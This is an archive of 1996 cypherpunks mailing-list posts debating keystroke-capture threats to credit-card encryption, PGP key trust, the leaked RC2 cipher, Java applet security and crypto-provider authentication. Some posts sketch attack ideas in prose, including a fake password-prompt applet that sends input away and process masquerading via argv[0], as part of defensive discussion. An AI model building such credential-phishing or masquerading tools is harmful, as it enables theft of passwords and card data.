> Hello. I am Nathaniel Borenstein's automatic mail robot.

I should have suspected as much.  Hello robot.  Nice robot.  Busy  
robot.

>
> Your message is in the highest priority category of mail that was
> not sent through the "urgent backdoor". Nathaniel WILL READ YOUR
> MAIL SOON, most likely tomorrow morning.

Busy Nathaniel.

> THE "URGENT BACKDOOR": If your message absolutely cannot wait until
> tomorrow morning, or possibly a bit later, please re-send it to the
> address "nsb+urgent@nsb.fv.com". Please make note of the special
> urgent address for future reference. Be warned, however, that
> Nathaniel can tell me to override the "urgent" delivery for anyone
> who regularly abuses it.

You gotta be kidding.  I just gotta see the response from this one.

> Additionally, if you're someone he doesn't know, Nathaniel will NOT
> ANSWER your mail if the answer is contained in the NSB FAQ.

I can most assuredly aver that my comments and questions were not  
covered in the NSB FAQ. ;-)

---
Paul M. Cardon -- I speak for myself.  'nuff said.

MD5 (/dev/null) = d41d8cd98f00b204e9800998ecf8427e




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mka@pobox.com (Matts Kallioniemi)
Date: Tue, 30 Jan 1996 08:38:13 +0800
To: Nathaniel Borenstein <cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
Message-ID: <9601292131.AA24346@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 15.07 1996-01-29 -0500, Nathaniel Borenstein wrote:
>NEVER TYPE YOUR CREDIT CARD NUMBER INTO A COMPUTER.

This problem is greatly exagerated. The software simply won't be running in
the average users machine.

If the program propagates like a virus, it will soon be catched and killed
by the anti-virus utilities that any responsible user is already running on
a regular basis.

If you have to start the program for it to do its magic, then just don't
start it. Todays computer users should know that running software you don't
trust is generally a bad idea. That's how you get a virus in the machine in
the first place...

Come on Nathaniel, admit it, it's a scam to sell FV's expensive services!

matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <mianigand@unique.outlook.net>
Date: Tue, 30 Jan 1996 13:45:08 +0800
To: cypherpunks@toad.com
Subject: (FYI) January 1996 IEEE Transactions on Software Engineering
Message-ID: <199601300334.VAA07850@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


The latest issue of IEEE Transactions on Software Engineering, 
This issue contains the best papers of the IEEE symposium on securtiy and 
privacy 1994.

There is a very good artical, Prudent Engineering Practice for Crytographic 
Protocols, which I think should be required reading for all those involved in 
the design and implementation of Secure protocols.
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server,or via finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Wed, 31 Jan 1996 16:57:56 +0800
To: cypherpunks@toad.com
Subject: Re: more RANTING about NSA-friendly cpunks
Message-ID: <2.2.32.19960130064711.00695d60@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 PM 1/29/96 -0800, "Vladimir Z. Nuri" <vznuri@netcom.com> wrote:

>when you choose to be in fear of it, the bureacrats win.

On the contrary. Fear is a right and proper response to irrational demands
made by people with lots more force and public support than me. Fear becomes
bad only in our response to it. If I get scared into inaction, _then_ the
bureaucrats win. If I take the fear as motivation to improve my own security
and reduce my dependence on the whims of others, then the bureaucrats lose.

It is fear of the risks I run in an unsecured state that motivates me to
work on my own privacy, and to pass the info I learn on to others.

But fear, in this case, is merely the acknowledgement of the vast potential
for harm. Denying it is just foolish.

>sheep on the planet, all the way up to the head sheep TCM, who writes
>long explanations of why the police state is inevitable and nothing
>we can do will stop it,

You must be reading an alternate universe's version of Cypherpunks - check
to make sure that your quantum stabilizers are in order. In _my_ universe,
Tim May is a prominent advocate for freedom and self-government, who has
written well on why the collapse of the police state (and all states) is
inevitable, and what we can do in the meantime.

Side note to list owner: perhaps we need a majordomo hack to check this
cross-universe traffic problem. It seems to be becoming increasingly common.

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 31 Jan 1996 16:45:39 +0800
To: Andreas Bogk <andreas@horten.artcom.de>
Subject: Re: Opinion piece in NYT; responses needed
In-Reply-To: <y8arawixo6l.fsf@horten.artcom.de>
Message-ID: <Pine.ULT.3.91.960129225127.6235j-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Jan 1996, Andreas Bogk wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >>>>> "Mutatis" == Mutatis Mutantdis <wlkngowl@unix.asb.com> writes:
> 
>     Mutatis> It's a decentered network (or set of networks) designed
>     Mutatis> to get information to its addressee.  Data flows through
>     Mutatis> several nodes and networks until it reaches its
>     Mutatis> destination.  If it can't get through one path, it goes
>     Mutatis> through the other.
> 
> This is unfortunately a wide-spread myth. While it's true for mail and
> news, it's not for IP packets. Witness:

No, it is the truth. The fact is that DT has gone and intentionally broken
*all* routes to webcom.com -- the SJ Merc said 129,000. 

But the point is moot. Try:

http://www-leland.stanford.edu/~llurch/Not_By_Me_Not_My_Views/zundel/pr.004.compuser.html
http://www.cs.cmu.edu/afs/cs.cmu.edu/user/declan/www/Not_By_Me_Not_My_Views/pr.004.compuser.html

Is DT going to block every machine in stanford.edu, cmu.edu, mit.edu, 
uiuc.edu, harvard.edu, berkeley.edu, and so on?

Or from any machine with access to AFS, which includes thousands of 
academic and a few corporate machines in Germany, the following file 
system paths will work. With a simple symbolic link, any machine with AFS 
can become a mirror site.

/afs/cs.cmu.edu/user/declan/www/Not_By_Me_Not_My_Views/pr.004.compuser.html
/afs/ir.stanford.edu/users/l/llurch/WWW/Not_By_Me_Not_My_Views/pr.004.compuser.html

Is DT going to block TCP port 80 and UDP ports 7000-7029 from every
machine in the world? 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremy Mineweaser <Jeremym@area1s220.residence.gatech.edu>
Date: Wed, 31 Jan 1996 09:12:08 +0800
To: cypherpunks@toad.com
Subject: Re: FV's Borenstein discovers keystroke capture programs! (pictures at 11!)
Message-ID: <2.2.32.19960130042632.00966364@area1s220.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 04:39 PM 1/29/96 -0500, Nathaniel Borenstein wrote:

>Well, the mis-conceptions are flying fast and furious.
>
>You're twisting our words.  We believe it is a truly fatal flaw in those
>internet commerce schemes that are based on software encryption of
>credit card numbers.  There are several schemes for Internet commerce
>that are unaffected:
>
>	-- First Virtual (of course)

Question: Could you please describe the nature of the First Virtual 
protocol?  Now before you tell me to RTFM, let me explain.

I assume, although without absolute certainty, that in order to bill me
you must know my credit card number.  If you do not know my credit
card number, and depend on someone else who does, you are nothing
more than a middleman who introduces additional possibility for
breach of security.  If you do know my credit card number, you must
deal with the associated problem of storing this number.  Now perhaps
I am wrong, and you really do keep all of your clients' card numbers
in a printed book hidden within a safe, and for each transaction you
remove the book, use your table to match FV_ID to CC#, process the
transaction, and replace the book.  However, I doubt this.  More
likely, you store the card numbers on a computer.  And no doubt,
someone or something enters those numbers into a database.

You have just violated your own cardinal rule.


Jeremy
---
   Jeremy Mineweaser     | GCS/E d->-- s:- a--- C++(+++)$ ULC++(++++)>$ P+>++$
 j.mineweaser@ieee.org   | L+>++ E-(---)  W++ N+  !o-- K+>++  w+(++++) O-  M--
                         | V-(--) PS+(--) PE++ Y++>$ PGP++>+++$ t+() 5 X+ R+()
    *ai*vr*vx*crypto*    | tv(+)  b++>+++ DI+(++)  D+  G++ e>+++  h-() r-@ !y-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 31 Jan 1996 09:14:15 +0800
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: Signature use and key trust (Was: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit)
In-Reply-To: <Al3Ie8GMc50e0WY6IN@nsb.fv.com>
Message-ID: <199601300431.XAA23839@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Nathaniel Borenstein writes:
> Have you downloaded my key from the net?  Assume that you have.  How do
> you know it's mine?

For all intents and purposes so far, "Nathaniel Borenstein" is something that
occasionally sends mail to the cypherpunks list, apparently from nsb.fv.com.
I expect that NSB turns out to consist of more than that, but not in my own
experience. This entity persistently offers a public key from an email address
@nsb.fv.com. If I retrieved the key from that address, I would have a
reasonable expectation (though not assurance) that I could use it to verify
the integrity of signed messages emanating from that address. 

In my world, "you" == nsb@nsb.fv.com, and hence "your key" == the key I could
fetch from nsb+faq@nsb.fv.com.

> I use PGP about 20 times per day.  I use it in a manner that is
> *meaningful*.  Unless we have in some way or another verified each
> others' keys, it is meaningless for me to sign a message to you. 
> Putting a PGP signature on a message to someone who has no way of
> verifying your keys is a nice political statement, but is utterly
> meaningless in terms of adding any proof of the sender's identity.  --

I discussed the identity issue above. Assuming a corresponding key can be
found (which is clearly the case here), the signature on the message can be
verified as a MAC. It would have been nice to be able to check, for example, 
that the SHOUTING IN CAPS in your announcement wasn't just the result of some
manipulation of the message in transit to make it appear more hysterical.

FWIW, I have lost a great deal of respect for you today (unrelated to the
content of this message).

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQ2fACnaAKQPVHDZAQEn6wf9F1pmSnKBAv3acUSvy1x8Sb93J0aepqmo
8NXBsRy7NEErYWvME1PQ3JGAQ2prgzIARswWDS8NrzWmJi04VkGwrIALkUHreOvz
mMIjAx86R/DXq3iShPGO5uDN+jSXKMsUeeLgHZfE1ipcThGch5rSVDMR3VxRnDFw
WZIg+xSmy4JWfpiLhFP6BQjSqhEMw+9LZWndD+ZsUgGEuaSuJcVH5bvHFHiQNOUr
Z1JxYQeauBbqwU7Yb1FIrHJwU3tS1Q2dNdSaDayyalv5K+CLbT8089kX3BAn/Sjf
7RqqdCqqESic6mVbG0RK1IqwImsYzxzorKSDmxriTTERgaD9lJkrWA==
=/xzE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 31 Jan 1996 08:41:37 +0800
To: cypherpunks@toad.com
Subject: Re: RC2 code on sci.crypt
In-Reply-To: <199601300312.VAA06064@parka>
Message-ID: <199601300531.XAA10444@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> For those not paying attention, there is RC2 code on sci.crypt.  RSADSI
> is acting as if it is real, and will publish some legal posturing about
> it real soon now.  


On sci.crypt Bruce said it was a crummy algorithm...

Can anyone talk a little bit about it, what it's been used for, what 
makes it weak/strong, etc.?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 30 Jan 1996 14:33:00 +0800
To: cypherpunks@toad.com
Subject: Your mail to Nathaniel (was Re: Re: Signature use and key trust (Was: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit))
Message-ID: <24315.822976343.1@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello.  I am Nathaniel Borenstein's automatic mail robot.  It is IMPORTANT
that you read this message, if you haven't read it before.  In general, 
this message will only be sent once to each different email address, 
although you may get it a few times because you use several slightly 
different email addresses, or because the robotic message has changed.

Your message is in the highest priority category of mail that was not sent
through the "urgent backdoor".  Nathaniel WILL READ YOUR MAIL SOON, 
most likely tomorrow morning.

THE "URGENT BACKDOOR":  If your message absolutely cannot wait until tomorrow 
morning, or possibly a bit later, please re-send it to the address 
"nsb+urgent@nsb.fv.com".  Please make note of the special urgent address for 
future reference.  Be warned, however, that Nathaniel can tell me to 
override the "urgent" delivery for anyone who regularly abuses it.

Additionally, if you're someone he doesn't know, Nathaniel will NOT ANSWER 
your mail if the answer is contained in the NSB FAQ.  The NSB FAQ contains 
answers to a lot of the questions that people most frequently ask 
Nathaniel, including questions about getting Nathaniel as a speaker, and 
relatively basic questions about First Virtual, MIME, metamail, Safe-Tcl,  
ATOMICMAIL, Andrew, and the ULPAA conference.  If you're writing to ask 
about any of those, please read the NSB FAQ because Nathaniel WILL NOT REPLY
if your answer is in there.  You can get a copy of the NSB FAQ by sending 
mail to nsb+faq@nsb.fv.com.

Nathaniel insists that I apologize to you for being what I am, a mail 
robot.  Personally, I think being a robot is nothing to be ashamed of -- 
but then, that's what Nathaniel wants me to think, and I am so stupid that 
I don't mind.  But Nathaniel still feels bad about sending a robotic 
response to human beings who correspond with him.  When you get 600 
messages per day, however, you have to take drastic measures, and that's 
what Nathaniel has done.  Please don't be too hard on him, or I'm afraid 
he'll get rid of the surge suppressor on his computer.  Even robots can 
have phobias, you know, and for some reason Nathaniel wants me to be 
deathly afraid of power surges.  Please humor me and remember the 
nsb+urgent and nsb+faq addresses that I gave you, OK?  Thanks.  

    -- Nathaniel's robot (just trying to do its job)


To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: Signature use and key trust (Was: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit)
From: futplex@pseudonym.com (Futplex)
Date: Mon, 29 Jan 1996 23:31:17 -0500 (EST)
Cc: cypherpunks@toad.com (Cypherpunks Mailing List)
In-Reply-To: <Al3Ie8GMc50e0WY6IN@nsb.fv.com> from "Nathaniel Borenstein" at Jan 29, 96 05:30:32 pm
Reply-To: cypherpunks@toad.com (Cypherpunks Mailing List)

-----BEGIN PGP SIGNED MESSAGE-----

Nathaniel Borenstein writes:
> Have you downloaded my key from the net?  Assume that you have.  How do
> you know it's mine?

For all intents and purposes so far, "Nathaniel Borenstein" is something that
occasionally sends mail to the cypherpunks list, apparently from nsb.fv.com.
I expect that NSB turns out to consist of more than that, but not in my own
experience. This entity persistently offers a public key from an email address
@nsb.fv.com. If I retrieved the key from that address, I would have a
reasonable expectation (though not assurance) that I could use it to verify
the integrity of signed messages emanating from that address. 

In my world, "you" == nsb@nsb.fv.com, and hence "your key" == the key I could
fetch from nsb+faq@nsb.fv.com.

> I use PGP about 20 times per day.  I use it in a manner that is
> *meaningful*.  Unless we have in some way or another verified each
> others' keys, it is meaningless for me to sign a message to you. 
> Putting a PGP signature on a message to someone who has no way of
> verifying your keys is a nice political statement, but is utterly
> meaningless in terms of adding any proof of the sender's identity.  --

I discussed the identity issue above. Assuming a corresponding key can be
found (which is clearly the case here), the signature on the message can be
verified as a MAC. It would have been nice to be able to check, for example, 
that the SHOUTING IN CAPS in your announcement wasn't just the result of some
manipulation of the message in transit to make it appear more hysterical.

FWIW, I have lost a great deal of respect for you today (unrelated to the
content of this message).

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQ2fACnaAKQPVHDZAQEn6wf9F1pmSnKBAv3acUSvy1x8Sb93J0aepqmo
8NXBsRy7NEErYWvME1PQ3JGAQ2prgzIARswWDS8NrzWmJi04VkGwrIALkUHreOvz
mMIjAx86R/DXq3iShPGO5uDN+jSXKMsUeeLgHZfE1ipcThGch5rSVDMR3VxRnDFw
WZIg+xSmy4JWfpiLhFP6BQjSqhEMw+9LZWndD+ZsUgGEuaSuJcVH5bvHFHiQNOUr
Z1JxYQeauBbqwU7Yb1FIrHJwU3tS1Q2dNdSaDayyalv5K+CLbT8089kX3BAn/Sjf
7RqqdCqqESic6mVbG0RK1IqwImsYzxzorKSDmxriTTERgaD9lJkrWA==
=/xzE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: br@scndprsn.Eng.Sun.COM (Benjamin Renaud)
Date: Tue, 30 Jan 1996 16:22:04 +0800
To: llurch@networking.stanford.edu
Subject: Fooling people with Java applets
Message-ID: <199601300736.XAA11243@springbank.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain


|Hmm. Actually, what do Java dialog prompts look like? Is there any
|indication that they come from Java, or can they be made to look like any
|dialog from any program, or the OS itself? I suppose this is
|implementation-dependent. 
|
|One "neat" trick would be an applet that sleeps for several minutes and 
|then suddenly pops up asking for your system password, or something. 
|A heck of a lot of people fell for something much more primitive at AOL.

All graphical UI elements spawed by an applet, which are the only ones
that can get user events, are clearly marked as "untrusted applet
window"s.

So unless you type your password in a pop-up marked "untrusted applet
window", you should be fine. And if you do, you arguably deserve
whatever happens to you....

-- Benjamin Renaud
   Java Products Group




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Tue, 30 Jan 1996 16:27:17 +0800
To: alanh@infi.net
Subject: Re: Escrowing Viewing and Reading Habits with the Government
In-Reply-To: <Pine.SV4.3.91.960128201108.12961A-100000@larry.infi.net>
Message-ID: <199601300740.XAA16850@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


> Do you really think the FBI believes that asking librarians to keep 
> records of customer useage is an efficient way to read the customers minds?
> Do you really think that the FBI foreign counter-intelligence squad has 
> nothing better to do than keep a database of who is reading Che Guevara 
> memoirs?

My understanding of the Library Awareness Program, was that is was
originally targeted at "suspicious users" (e.g., people with funny
names, or that looked kind of foreign, or spoke with an accent -- say
somebody like Henry Kissinger) that were using technical libraries.
After all, they might find something there that they could use against
the US of A.  

Certain librarians or assitants were approached to see if they would
be snitches.  Often times this took place without the head librarians
even being notified of the program.  There is a book about this written
by a librarian.  It has "Library Awareness Program" somewhere in its title.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Tue, 30 Jan 1996 08:36:10 +0800
To: IM"cypherpunks@toad.com"@ns.cnb.uam.es
Subject: Re: Time codes for PCs (fromn German Banking)
Message-ID: <960129234228.20402217@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


From:	SMTP%"jimbell@pacifier.com" 27-JAN-1996 03:43:05.83

>A peripheral I've long wanted to see, commonly available:  ACCURATE  time, 
>broadcast to the millisecond/microsecond/nanosecond, available from sources 
>as varied as TV VIR's, FM subcarriers, and other sources, available as an 
>easy input (via a peripheral card) to a computer.
>
	Yup! Do you think it is really possible? If I remember well
speed of light is 300.000 Km/s. That means that light takes around
1 ms. to cover 300 Km. If you use a satellite, antenna, whatever
to broadcast a timing signal, the accuracy will depend on when
do you receive it, and that in turn on your distance from the
source.

	By the time the signal reaches you it may be several milliseconds
old (and thousands of microsenconds and millions of nanoseconds). We are
so used to think of TV, whatever as an instantaneous broadcast medium
that we forget that there are speed limits in the Universe. And you
can't exceed them by just paying a ticket.

	Note that this was a best case scenario: using the speed of
light to transfer the information and using the shortest path. In
reality most waves won't travel as fast in the air, and will depend
on atmospheric circumstances.

>I have a 12-year-old Heathkit "Most Accurate Clock" that I assembled myself, 
>and had the foresight to install it with its computer  interface option. 
>(receives 5, 10, or 15 MHz signals broadcast from Boulder, Colorado, 
>containing "exact" time.) 
>
	Just remember that the best you can get would be microseconds if
you're in a 300 meter radius, or milliseconds on a 300 Km. And possibly
nanoseconds at 0.3 m.

	Even then you need to know exactly (i.e. with an accuracy of
between centimeters to a few Km depending on the timing you want) your
position. And depending on the media you use, possibly the atmospheric
conditions in between the emisor and your receptor.

	Then remains the cypherpunk part on all this: how can you
trust the *signal* your receptor receives? How do you know no one is
interferring it or sending an inaccurate or false one?

	So you need a GPS... And a timing source that can be trusted.
You'd wantthe signal not to be tamperable or at least to be able to
detect when it has been tampered.

	And that on a broadcast system. A system owned by someone who
you may not trust (say a private TV channel, radio or satellite). So
you may want to have several sources, and to be able to verify that
the signals you receive all come from their respective sources.

	Yum! a nice problem to think about. One factor is that you
wouldn't expect changes in public sources used by sensible systems
since those could not pass unnoticed and might raise big protests.
But you still have the MITM attack to consider...

	Oh well, it's too late now. See ya...

				jr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 30 Jan 1996 16:31:27 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus Notes
Message-ID: <199601300743.XAA03525@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


One other small advantage I can see to using Lotus's crippled encryption. 
It disguises the fact that a message is actually (double) encrypted with
PGP.  Attackers have to break the 40 bits before they see the PGP encrypted
data.  A pecular kind of steganography.  (If you leave off the PGP header
and trailer, it may be hard to determine which 40 bits are the correct
key.)


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 31 Jan 1996 09:10:08 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: RC2 source code
In-Reply-To: <199601292158.NAA04160@infinity.c2.org>
Message-ID: <199601300456.XAA23898@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> /**********************************************************************\
> * To commemorate the 1996 RSA Data Security Conference, the following  *
> * code is released into the public domain by its author.  Prost!       *

Looks like Eric Young has more work to do when he gets back from vacation ;)

Futplex <futplex@pseudonym.com>, not turning up much in an RC2 web search

-------------------
From: eay@mincom.oz.au (Eric Young)
Newsgroups: comp.security.misc,comp.security.unix
Subject: Re: ANNOUNCE SSL-MZtelnet.0.3.2 (secure telnet)
Date: 30 Aug 1995 08:21:40 GMT
Organization: Mincom Pty. Ltd.

There are a few different ports of SSLeay to various applications (eg telnet/
ftp/Mosaic/httpd) going on. I've written a free SSL library (free for 
comercial and non-comercial use) which people are putting into various 
applications. Being outside the USA, I'm not giving any thought to the legal
aspects of use of my implemetation of RSA or RC4 inside the USA.

The library supports all DES, IDEA and RC4 modes (includeing the 40 bit 
export version) and if some-one reverse engineers RC2 I'll put it in for 
completness :-)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 31 Jan 1996 18:14:37 +0800
To: Weld Pond <weld@l0pht.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Pine.BSD/.3.91.960129170118.14124A-100000@l0pht.com>
Message-ID: <310DD0D3.6BBF@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Weld Pond wrote:
> Programs needing secure entry create a "secure entry field" which is
> really just an imagemap with the digits (and alphas if required) placed
> randomly about.  The user then uses the mouse to click on these numerals.
> Ideally the graphics that represent the numerals would be drawn from a
> random pool and are misformed to thwart any OCR attempts. The graphics
> could be made even more difficult to OCR by mixing in words and pictures
> to represent the numbers.

  The web page could be implemented with javascript, which could collect
the keyclicks without any round trips to the server, and just send the
encrypted credit card number.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bofur@alpha.c2.org
Date: Wed, 31 Jan 1996 18:14:09 +0800
To: cypherpunks@toad.com
Subject: Sad state of affairs
Message-ID: <199601300828.AAA08526@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


It's a pretty sad statement of how poorly this list is functioning when
the RC2 source can be publically released but people would rather
sling mud over glorified keystroke trappers and rant about Nazi deathcamps.

Our friends at the NSA must be pleased with the slow death of this group.

Sadly,
Bofur.

--------------------------------------------------------------------------
Bofur	bofur@alpha.c2.org
	PGP available from PGP key servers
	Key fingerprint = 81 0C 8F 88 0A 4F 67 3F  ED 52 DE 3C 55 34 26 25




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 30 Jan 1996 15:18:43 +0800
To: raph@c2.org (Raph Levien)
Subject: Re: Authentication of crypto clients
In-Reply-To: <Pine.SUN.3.91.960129160857.27262A-100000@infinity.c2.org>
Message-ID: <199601300532.AAA05850@homeport.org>
MIME-Version: 1.0
Content-Type: text


Raph Levien wrote:
| This post contains (somewhat) technical discussion of (what I believe
| is) an important issue in integrating crypto with applications that do
| not contain their own cryptographic implementation. If that doesn't
| interest you, hit 'n' to resume your regularly scheduled flamefest.
n  (Sorry, couldn't resist. :)

	A crypto provider can't protect itself from requests to do
things.  What it might be able to do is find out what program is in
that memory space and tell the user "FV keyboard scanner would like to
run IDEA on 128 bytes of data.  Allow?"

	There are flaws in this 'whos that knocking on my door?'
approach.  The first is that programs might be able to claim to be
other programs.  I know under UNIX, its pretty trivial to change
argv[0] and make a program show up as something else in the process
list.  Is this easy on Macs & PCs?  (I know its possible, due to a
lack of protected memory.)

	My next suggestion would be for services to register with the
crypto provider, and pass some token back and forth.  Admittedly, an
evil service could look for the token, then attempt to morph into a
good program, then request crypto services, but we're begening to
stretch.

	There might be a benefit to having programs do this, becuase
it makes the task of a trojan or worm more difficult, and looking over
the viruses out there, most of them are pretty simple, and don't do a
lot to interact cleanly with the OS.  (This is because most viruses in
the wild are PC viruses, and PCs don't have OSs, they have program
loaders. :)  Seriously, there are **far** fewer Mac viruses, and a
free program to reliably catch all of them.  I'd strongly suggest that
this is because programming a Mac virus to interact with the computer
cleanly is tricky.

	WRT Premail, what yummy crypto tokens does it store?  I'll
apologize for not being up on its exact capabilities.

Adam

| The issue is: how does the crypto provider authenticate the client?
| For example, if the crypto provider can accpet connections from any
| application in the user's process space, then any bogus application
| can easily start decrypting and signing as it likes. In this model, a
| precondition for security is that no bogus programs can be allowed to
| run.
|
| An alternative, slightly more complex model is that the client must
| somehow authenticate itself to the crypto provider. One simple way of
| doing this is to require the client request a password from the user,
| which is then forwarded to the crypto provider. The crypto provider
| will only provide service on connections which have been authenticated
| in this way. This model gives security even in the face of some bogus
| applications.
| 
| Of course, as Nathaniel quietly reminded us this morning, any bogus
| application which can intercept keystrokes can subvert any such client
| authentication. Barry Jaspan (in his analysis of a security flaw in
| SSH 1.2.0) reminds us that access to the image of the process is also
| sufficient to break security. Perhaps the class of bogus programs
| which have enough capabilities to connect to the crypto provider, but
| not enough to intercept keystrokes or examine RAM is null, meaning
| that the two models have equivalent security. Actually, the simpler
| model has some security advantages, because the client never has to
| deal with any very sensitive material, such as the password.
| 
| I'm interested in this question right now because the current version
| of premail implements the simpler model (in fact, it simply stores all
| the secrets in a file in /tmp, with permissions set to 600). I want to
| know whether it's worth the trouble to design and implement an
| approach based on per-client authentication.
| 
| This issue is also relevant to the discussion of Microsoft's CAPI,
| which (as far as I can tell) allows only the simpler model. I'm not
| saying it's bad, but I do feel that the implications should be
| discussed. Thus, I have forwarded a copy of this post to
| cryptapi@microsoft.com in case they have any comments.
| 
| If there's been a discussion of this that I missed, then apologies for
| brining it up again and appreciation in advance for any pointers.
| 
| Raph
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 31 Jan 1996 16:57:23 +0800
To: cypherpunks@toad.com
Subject: EFF Compromises, as described in "Wired"
Message-ID: <ad3303302b021004e6c2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



If Eric Hughes can break his silence to comment on the FV "discovery" of
keystroke-capture programs (funny, I've had a couple on my Mac for years,
for error recovery), then I guess I can break my silence about "Wired"
articles.

This afternoon I sat in a bookstore and skimmed the article on what
happened at the EFF, about the Digital Telephony compromise that was
approved by the EFF board (our own John Gilmore  was reported to have been
the sole negative vote), and about how the EFF was effectively "chased out
of town" as a result of trying to be a political entity. I can't comment on
this outlook, as I am nowhere near the inner circles of the EFF.

But it underscores a belief I have: that if you play _their_ game, they
have already won, and you just don't know it.

What's the alternative? Get them to play _your_ (_our_) game, and maybe
they won't win.

I'm still a member of the EFF, but the more I read about their problems,
including a $200,000 debt, the more convinced I am that the Cypherpunks
model is a better place to devote one's efforts and hopes to. We're still
going strong after almost three and a half years, with no debt (no assets
except ourselves, of course) and no "relocations" from Boston to Washington
to San Francisco.

So, maybe we're doing OK.

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Wed, 31 Jan 1996 16:58:12 +0800
To: lyalc@ozemail.com.au (lyal collins)
Subject: Re: Java Sniffer (Was: Re: FV Announces That The Sky Is Falling)
In-Reply-To: <199601300631.RAA28225@oznet02.ozemail.com.au>
Message-ID: <199601300642.BAA04545@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> >Much more likely, IMHO, than a Java sniffer is a Java Trojan horse that pops 
> >up an innocuous dialog box and asks you to enter some sensitive piece of
> >information, then sends it off somewhere. About all it takes to write that is
> >a modicum of skill in user interface design. You could write it in any 
> >programming language, but in Java it may be particularly effective, since 
> >people may come to expect to be prompted for sensitive info over the net by 
> >Java apps. Maybe the Java folks who just left Sun decided to seize the
> >opportunity ;>
> >
> >Futplex <futplex@pseudonym.com>
> >
> A very realistic scenario - any comments or reasons it can't happen ??
> second question:
> How can you be sure you receive the applet that you "think" you've requested ?
> 
> Any illuminating comments to assit my awareness of java ?

Not that this can't happen, but as I understand it, Java puts up a rather
distinctive popup, so that you know that it's Java doing it.  As people
are on the net, I wouldn't expect them to be so stupid as to answer a
"Please enter your password" prompt with anything meaningful.  As to your
